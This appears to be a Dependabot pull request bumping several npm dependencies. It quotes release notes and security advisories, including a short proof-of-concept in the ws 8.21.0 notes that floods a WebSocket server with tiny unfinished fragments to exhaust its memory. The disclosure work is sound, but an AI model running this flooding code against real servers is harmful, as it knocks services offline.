Skip to content

Bump the npm_and_yarn group across 2 directories with 9 updates#4

Open
dependabot[bot] wants to merge 1 commit into
mainfrom
dependabot/npm_and_yarn/npm_and_yarn-5b7a965c95
Open

Bump the npm_and_yarn group across 2 directories with 9 updates#4
dependabot[bot] wants to merge 1 commit into
mainfrom
dependabot/npm_and_yarn/npm_and_yarn-5b7a965c95

Conversation

@dependabot

@dependabot dependabot Bot commented on behalf of github Jun 28, 2026

Copy link
Copy Markdown
Contributor

Bumps the npm_and_yarn group with 6 updates in the / directory:

Package From To
vite 8.0.10 8.1.0
vitest 3.2.4 4.1.9
ws 8.18.3 8.21.0
js-yaml 4.1.1 4.3.0
react-router 6.30.3 7.18.0
undici 7.25.0 7.28.0

Bumps the npm_and_yarn group with 4 updates in the /server directory: ws, uuid, @grpc/grpc-js and qs.

Updates vite from 8.0.10 to 8.1.0

Release notes

Sourced from vite's releases.

create-vite@8.1.0

Please refer to CHANGELOG.md for details.

plugin-legacy@8.1.0

Please refer to CHANGELOG.md for details.

v8.1.0

Please refer to CHANGELOG.md for details.

plugin-legacy@8.1.0-beta.0

Please refer to CHANGELOG.md for details.

v8.1.0-beta.0

Please refer to CHANGELOG.md for details.

v8.0.16

Please refer to CHANGELOG.md for details.

v8.0.15

Please refer to CHANGELOG.md for details.

v8.0.14

Please refer to CHANGELOG.md for details.

v8.0.13

Please refer to CHANGELOG.md for details.

v8.0.12

Please refer to CHANGELOG.md for details.

v8.0.11

Please refer to CHANGELOG.md for details.

Changelog

Sourced from vite's changelog.

8.1.0 (2026-06-23)

Features

Bug Fixes

  • bundled-dev: errors should be kept when incremental build fails (#22617) (9a0dd48)
  • cache falsy values in perEnvironmentState (#22715) (0e91e79)
  • glob: respect caseSensitive option in hmr matcher (#22711) (65f525e)
  • html: omit nonce on import map when cspNonce is unset (#22713) (8340bb5)
  • optimizer: skip null-valued exports in expandGlobIds glob resolution (#22611) (8b9f5cd)
  • resolved build options should be kept as a getter (#22691) (3527191)
  • server: handle malformed URI in memory files middleware (#22714) (df9e0a5)
  • use literal envPrefix queries for Vite Task (#22706) (da72733)
  • warn on deprecated envFile (#22555) (ed7b283)

Code Refactoring

8.1.0-beta.0 (2026-06-15)

Features

  • import.meta.glob support caseSensitive option (#21707) (2ad6737)
  • add warning to discourage Vite with yarn pnp (#21906) (3fbb55a)
  • build: chunk importmap (#21580) (e180312)
  • css: support lightningcss plugin dependency (#21748) (0b7aaed)
  • deps: bump @​vitejs/devtools peer dependency version (#22542) (d2c2bc0)
  • html: add html.additionalAssetSources option (#21412) (a41404b)
  • integrate with Vite Task for zero-config build caching (#22453) (f8d75f7)
  • rename server.hmr options to server.ws options (#21357) (9ce3036)
  • server: support multiple hosts in __VITE_ADDITIONAL_SERVER_ALLOWED_HOSTS (#21501) (735f9a1)
  • track dependencies when loading config with native (#22602) (a7e2da8)
  • types: add more precise typing for known query types to match known as types (#21863) (cc39e55)
  • update rolldown to 1.1.1 (#22593) (8a13d63)
  • wasm: direct .wasm imports (WASM ESM Integration) (#21779) (c23d85b)

Bug Fixes

  • apply correct fs restrictions for pnpm gvs (#22415) (092320b)
  • css: support external CSS with lightningcss (#18389) (d64a1a5)
  • deps: update all non-major dependencies (#22637) (44bb9d9)
  • deps: update all non-major dependencies (#22681) (f4f0633)
  • html: insert import map before modulepreload that is not self-close tag (#21409) (e399c89)
  • optimizer: preserve sourcemaps for transformed optimized deps with follow-up transforms (#22428) (1298951)

... (truncated)

Commits

Updates vitest from 3.2.4 to 4.1.9

Release notes

Sourced from vitest's releases.

v4.1.9

🐞 Bug Fixes

View changes on GitHub

v4.1.8

   🐞 Bug Fixes

    View changes on GitHub

v4.1.7

   🐞 Bug Fixes

    View changes on GitHub

v4.1.6

   🐞 Bug Fixes

   🏎 Performance

    View changes on GitHub

v4.1.5

   🚀 Experimental Features

   🐞 Bug Fixes

... (truncated)

Commits
  • a7a61e7 chore: release v4.1.9 (#10598)
  • 934b0f5 fix(pool): prevent test run hang on worker crash (#10543) [backport to v4] (#...
  • 7fb2965 fix(browser): wait for orchestrator readiness before resolving browser sessio...
  • a518019 fix: fix importOriginal with optimizer and query import [backport to v4] (#...
  • e61f2dd chore: release v4.1.8
  • e4067b3 fix(browser): disable client cdp API when allowWrite/allowExec: false [ba...
  • a09d472 chore: release v4.1.7
  • a8fd24c chore: release v4.1.6
  • 18af98c fix(browser): simplify orchestrator otel carrier (#10285)
  • 3188260 feat(browser): provide project reference in ToMatchScreenshotResolvePath (#...
  • Additional commits viewable in compare view
Maintainer changes

This version was pushed to npm by GitHub Actions, a new releaser for vitest since your current version.


Updates vitest from 3.2.4 to 4.1.9

Release notes

Sourced from vitest's releases.

v4.1.9

🐞 Bug Fixes

View changes on GitHub

v4.1.8

   🐞 Bug Fixes

    View changes on GitHub

v4.1.7

   🐞 Bug Fixes

    View changes on GitHub

v4.1.6

   🐞 Bug Fixes

   🏎 Performance

    View changes on GitHub

v4.1.5

   🚀 Experimental Features

   🐞 Bug Fixes

... (truncated)

Commits
  • a7a61e7 chore: release v4.1.9 (#10598)
  • 934b0f5 fix(pool): prevent test run hang on worker crash (#10543) [backport to v4] (#...
  • 7fb2965 fix(browser): wait for orchestrator readiness before resolving browser sessio...
  • a518019 fix: fix importOriginal with optimizer and query import [backport to v4] (#...
  • e61f2dd chore: release v4.1.8
  • e4067b3 fix(browser): disable client cdp API when allowWrite/allowExec: false [ba...
  • a09d472 chore: release v4.1.7
  • a8fd24c chore: release v4.1.6
  • 18af98c fix(browser): simplify orchestrator otel carrier (#10285)
  • 3188260 feat(browser): provide project reference in ToMatchScreenshotResolvePath (#...
  • Additional commits viewable in compare view
Maintainer changes

This version was pushed to npm by GitHub Actions, a new releaser for vitest since your current version.


Updates ws from 8.18.3 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

8.20.1

... (truncated)

Commits
  • bca91ad [dist] 8.21.0
  • 2b2abd4 [security] Limit retained message parts
  • 78eabe2 [security] Add latest vulnerability to SECURITY.md
  • 5d9b316 [dist] 8.20.1
  • c0327ec [security] Fix uninitialized memory disclosure in websocket.close()
  • ce2a3d6 [ci] Test on node 26
  • 58e45b8 [ci] Do not test on node 25
  • 5f26c24 [ci] Run the lint step on node 24
  • 8439255 [dist] 8.20.0
  • d3503c1 [minor] Export the PerMessageDeflate class and header utils
  • Additional commits viewable in compare view

Updates js-yaml from 4.1.1 to 4.3.0

Changelog

Sourced from js-yaml's changelog.

4.3.0 - 2026-06-27

Added

  • [backport] Added maxTotalMergeKeys (10000) loader option to limit the total number of keys processed by YAML merge (<<) across one load() / loadAll() call.

Fixed

  • Restore umd builds back to es5.

Removed

  • [backport] maxMergeSeqLength replaced with maxTotalMergeKeys for limiting YAML merge processing.

[4.2.0] - 2026-06-01

Added

  • Added docs/safety.md with notes about processing untrusted YAML.
  • Added maxDepth (100) loader option. Not a problem, but gives a better exception instead of RangeError on stack overflow.
  • Added maxMergeSeqLength (20) loader option. Not a problem after merge fix, but an additional restriction for safety.
  • Added sourcemaps to dist/ builds.

Changed

  • Stop resolving numbers with underscores as numeric scalars, #627.
  • Switched dev toolchains to Vite / neostandard.
  • Updated demo.
  • Reorganized tests.
  • dist/ files are no longer kept in the repository.

Fixed

  • Fix parsing of properties on the first implicit block mapping key, #62.
  • Fix trailing whitespace handling when folding flow scalar lines, #307.
  • Reject top-level block scalars without content indentation, #280.
  • Ensure numbers survive round-trip, #737.
  • Fix test coverage for issue #221.
  • Fix flow scalar trailing whitespace folding, #307.
  • Fix digits in YAML named tag handles.

Security

  • Fix potential DoS via quadratic complexity in merge - deduplicate repeated elements (makes sense for malformed files > 10K).

[3.14.2] - 2025-11-15

Security

  • Backported v4.1.1 fix to v3
Commits
  • 33d05b5 4.3.0 released
  • 663bfab Drop demo publish, to not override new v5 one.
  • 1cb8c7b Add v4-legacy tag for publish
  • 02f27af Restore umd builds back to es5
  • 8be84ed Fix es5 compatibility
  • 59423c6 Replace maxMergeSeqLength option with maxTotalMergeKeys (more robust). Ba...
  • 6842ef6 doc polish
  • 590dbab 4.2.0 released
  • f944dc5 Add package.json funding field
  • f692719 Changelog update
  • Additional commits viewable in compare view

Updates react-router from 6.30.3 to 7.18.0

Release notes

Sourced from react-router's releases.

v7.18.0

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7180

v7.17.0

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7170

v7.16.0

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7160

v7.15.1

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7151

v7.15.0

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7150

v7.14.2

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7142

v7.14.1

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7141

v7.14.0

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7140

v7.13.2

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7132

v7.13.1

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7131

v7.13.0

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7130

v7.12.0

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7120

v7.11.0

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7110

v7.10.1

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7101

v7.10.0

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v7100

v7.9.6

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v796

v7.9.5

See the changelog for release notes: https://github.com/remix-run/react-router/blob/main/CHANGELOG.md#v795

... (truncated)

Changelog

Sourced from react-router's changelog.

v7.18.0

Patch Changes

  • Fix server handler prerender responses when using ssr: false and future.v8_trailingSlashAwareDataRequests: true. Avoids false positive "SPA Mode" detection when serving prerendered paths (#15173)
  • Use the ServerRouter nonce for nonce-aware SSR components when they don't provide their own value so strict CSP pages can load them. (#15170)
  • Use turbo-stream to serialize and deserialize Framework Mode hydration errors (#15175)
  • Precompute route branch matchers to avoid recompiling route path regexes during matching (#15186)
  • Use the constructed request URL host when validating action request origins. (#15185)
  • Remove the un-documented custom error serialization logic from Data Mode SSR built-in hydration flows (#15175)
  • Validate protocols in RSC render redirects (#15177)
  • Consolidate url normalization logic and better handle mixed slashes (#15176)

v7.17.0

Minor Changes

  • Ship a subset of the official documentation inside the react-router package (#15121)
    • Markdown docs are now available in node_modules/react-router/docs, letting AI coding agents and the React Router agent skills read official docs locally
    • Excludes auto-generated API docs (api/), community/ content, and tutorials (tutorials/)

v7.16.0

Minor Changes

  • Stabilize future.unstable_trailingSlashAwareDataRequests as future.v8_trailingSlashAwareDataRequests (#15098)

Patch Changes

  • Disable manifest path when lazy route dicovery is disabled (#15068)

  • Fix browser URL creation to use the configured history window instead of the global window. (#15066)

    • Pass the history/router window through to createBrowserURLImpl so custom window contexts keep the correct URL origin.
  • Fix useNavigation() return type to preserve discriminated union across navigation states (#15095)

  • Widen MetaDescriptor script:ld+json type from LdJsonObject to LdJsonObject | LdJsonObject[] to permit multiple JSON-LD schemas in a single <script type="application/ld+json"> tag emitted by <Meta /> (#15082)

v7.15.1

Patch Changes

  • Update router to operate on fetcher Maps in an immutable manner to avoid delayed React renders from potentially reading an updated but not yet committed Map. This could result in brief flickers in some fetcher-driven optimistic UI scenarios. (#15028)
  • Fix serverLoader() returning stale SSR data when a client navigation aborts pending hydration before the hydration clientLoader resolves (#15022)
  • Fix RouterProvider onError callback not being called for synchronous initial loader errors in SPA mode (#15039) (#14942)
  • Memoize useFetchers to return a stable identity and only change if fetchers changed (#15028)
  • Internal refactor to consolidate mutation request detection through shared utility (#15033)

Unstable Changes

... (truncated)

Commits

Updates undici from 7.25.0 to 7.28.0

Release notes

Sourced from undici's releases.

v7.28.0

⚠️ Security Release

This release line addresses 7 security advisories, all shipped in v7.28.0.

Action required: Upgrade to undici 7.28.0 or later.

npm install undici@^7.28.0

The v7 line is not affected by GHSA-38rv-x7px-6hhq (CVE-2026-9675), which is an 8.x-only regression.

Note on GHSA-hm92-r4w5-c3mj: this fix shipped in v7.28.0, not the earlier 7.2x line — the vulnerable single-pool code was still present through v7.27.2. The per-origin pool fix is 3805b8f8 (#5041).

Summary

Advisory CVE Severity (CVSS) Fixed in Fix commit
GHSA-vxpw-j846-p89q CVE-2026-12151 High (7.5) 7.28.0 8cb10f98
GHSA-vmh5-mc38-953g CVE-2026-9697 High (7.4) 7.28.0 04201f89
GHSA-hm92-r4w5-c3mj CVE-2026-6734 High (7.5) 7.28.0 3805b8f8
GHSA-pr7r-676h-xcf6 CVE-2026-9678 Moderate (5.9) 7.28.0 85a24055
GHSA-p88m-4jfj-68fv CVE-2026-9679 Moderate (5.9) 7.28.0 d0574cc4
GHSA-g8m3-5g58-fq7m CVE-2026-11525 Low (3.7) 7.28.0 d0574cc4
GHSA-35p6-xmwp-9g52 CVE-2026-6733 Low (3.7) 7.28.0 ea8930cf

High severity

WebSocket DoS via fragment count bypass — CVE-2026-12151

GHSA-vxpw-j846-p89q · CWE-400, CWE-770 Fix: 8cb10f98 websocket: limit the number of fragments in a message (part of backport a027a4a0 Backport WebSocket maxPayloadSize fixes to v7.x, #5423)

A malicious WebSocket server can stream a large number of small or empty continuation frames. Undici enforced a limit on cumulative payload size but did not limit the number of fragments per message, leading to unbounded memory growth and denial of service.

  • Affected: applications using new WebSocket(...) or WebSocketStream against untrusted endpoints.
  • Workaround: none — upgrade is required.

TLS certificate validation bypass in SOCKS5 ProxyAgent — CVE-2026-9697

GHSA-vmh5-mc38-953g · CWE-295

... (truncated)

Commits
  • f9eba0a Bumped v7.28.0 (#5430)
  • a027a4a Backport WebSocket maxPayloadSize fixes to v7.x (#5423)
  • 8cb10f9 websocket: limit the number of fragments in a message
  • 04201f8 fix: honor requestTls when proxy is SOCKS5
  • fcd642f fix(socks5): preserve dispatch backpressure return value (#5166)
  • bc98c97 fix(socks5): use configured connector in Socks5ProxyAgent (#5168)
  • 9e1c743 fix(socks5): encode embedded IPv4 tails in IPv6 literals correctly (#5099)
  • 376c8be fix(socks5): enforce authenticated state before CONNECT (#5097)
  • 3805b8f fix(socks5-proxy-agent): use per-origin pools to prevent cross-origin routing...
  • 85a2405 fix(cache): trim qualified field names
  • Additional commits viewable in compare view

Updates ws from 8.18.3 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

8.20.1

... (truncated)

Commits
  • bca91ad [dist] 8.21.0
  • 2b2abd4 [security] Limit retained message parts
  • 78eabe2 [security] Add latest vulnerability to SECURITY.md
  • 5d9b316 [dist] 8.20.1
  • c0327ec [security] Fix uninitialized memory disclosure in websocket.close()
  • ce2a3d6 [ci] Test on node 26
  • 58e45b8 [ci] Do not test on node 25
  • 5f26c24 [ci] Run the lint step on node 24
  • 8439255 [dist] 8.20.0
  • d3503c1 [minor] Export the PerMessageDeflate class and header utils
  • Additional commits viewable in compare view

Updates uuid from 9.0.1 to 14.0.0

Release notes

Sourced from uuid's releases.

v14.0.0

14.0.0 (2026-04-19)

⚠ BREAKING CHANGES

  • expect crypto to be global everywhere (requires node@20+) (#935)
  • drop node@18 support (#934)

Features

Bug Fixes

  • expect crypto to be global everywhere (requires node@20+) (

Bumps the npm_and_yarn group with 6 updates in the / directory:

| Package | From | To |
| --- | --- | --- |
| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `8.0.10` | `8.1.0` |
| [vitest](https://github.com/vitest-dev/vitest/tree/HEAD/packages/vitest) | `3.2.4` | `4.1.9` |
| [ws](https://github.com/websockets/ws) | `8.18.3` | `8.21.0` |
| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.1` | `4.3.0` |
| [react-router](https://github.com/remix-run/react-router/tree/HEAD/packages/react-router) | `6.30.3` | `7.18.0` |
| [undici](https://github.com/nodejs/undici) | `7.25.0` | `7.28.0` |

Bumps the npm_and_yarn group with 4 updates in the /server directory: [ws](https://github.com/websockets/ws), [uuid](https://github.com/uuidjs/uuid), [@grpc/grpc-js](https://github.com/grpc/grpc-node) and [qs](https://github.com/ljharb/qs).


Updates `vite` from 8.0.10 to 8.1.0
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/create-vite@8.1.0/packages/vite)

Updates `vitest` from 3.2.4 to 4.1.9
- [Release notes](https://github.com/vitest-dev/vitest/releases)
- [Changelog](https://github.com/vitest-dev/vitest/blob/main/docs/releases.md)
- [Commits](https://github.com/vitest-dev/vitest/commits/v4.1.9/packages/vitest)

Updates `vitest` from 3.2.4 to 4.1.9
- [Release notes](https://github.com/vitest-dev/vitest/releases)
- [Changelog](https://github.com/vitest-dev/vitest/blob/main/docs/releases.md)
- [Commits](https://github.com/vitest-dev/vitest/commits/v4.1.9/packages/vitest)

Updates `ws` from 8.18.3 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.18.3...8.21.0)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/4.3.0/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `react-router` from 6.30.3 to 7.18.0
- [Release notes](https://github.com/remix-run/react-router/releases)
- [Changelog](https://github.com/remix-run/react-router/blob/main/packages/react-router/CHANGELOG.md)
- [Commits](https://github.com/remix-run/react-router/commits/react-router@7.18.0/packages/react-router)

Updates `undici` from 7.25.0 to 7.28.0
- [Release notes](https://github.com/nodejs/undici/releases)
- [Commits](nodejs/undici@v7.25.0...v7.28.0)

Updates `ws` from 8.18.3 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.18.3...8.21.0)

Updates `uuid` from 9.0.1 to 14.0.0
- [Release notes](https://github.com/uuidjs/uuid/releases)
- [Changelog](https://github.com/uuidjs/uuid/blob/main/CHANGELOG.md)
- [Commits](uuidjs/uuid@v9.0.1...v14.0.0)

Updates `@grpc/grpc-js` from 1.14.3 to 1.14.4
- [Release notes](https://github.com/grpc/grpc-node/releases)
- [Commits](https://github.com/grpc/grpc-node/compare/@grpc/grpc-js@1.14.3...@grpc/grpc-js@1.14.4)

Updates `qs` from 6.14.2 to 6.15.3
- [Changelog](https://github.com/ljharb/qs/blob/main/CHANGELOG.md)
- [Commits](ljharb/qs@v6.14.2...v6.15.3)

---
updated-dependencies:
- dependency-name: vite
  dependency-version: 8.1.0
  dependency-type: direct:development
  dependency-group: npm_and_yarn
- dependency-name: vitest
  dependency-version: 4.1.9
  dependency-type: direct:development
  dependency-group: npm_and_yarn
- dependency-name: vitest
  dependency-version: 4.1.9
  dependency-type: direct:development
  dependency-group: npm_and_yarn
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: js-yaml
  dependency-version: 4.3.0
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: react-router
  dependency-version: 7.18.0
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: undici
  dependency-version: 7.28.0
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: uuid
  dependency-version: 14.0.0
  dependency-type: direct:production
  dependency-group: npm_and_yarn
- dependency-name: "@grpc/grpc-js"
  dependency-version: 1.14.4
  dependency-type: indirect
  dependency-group: npm_and_yarn
- dependency-name: qs
  dependency-version: 6.15.3
  dependency-type: indirect
  dependency-group: npm_and_yarn
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot dependabot Bot added dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code labels Jun 28, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants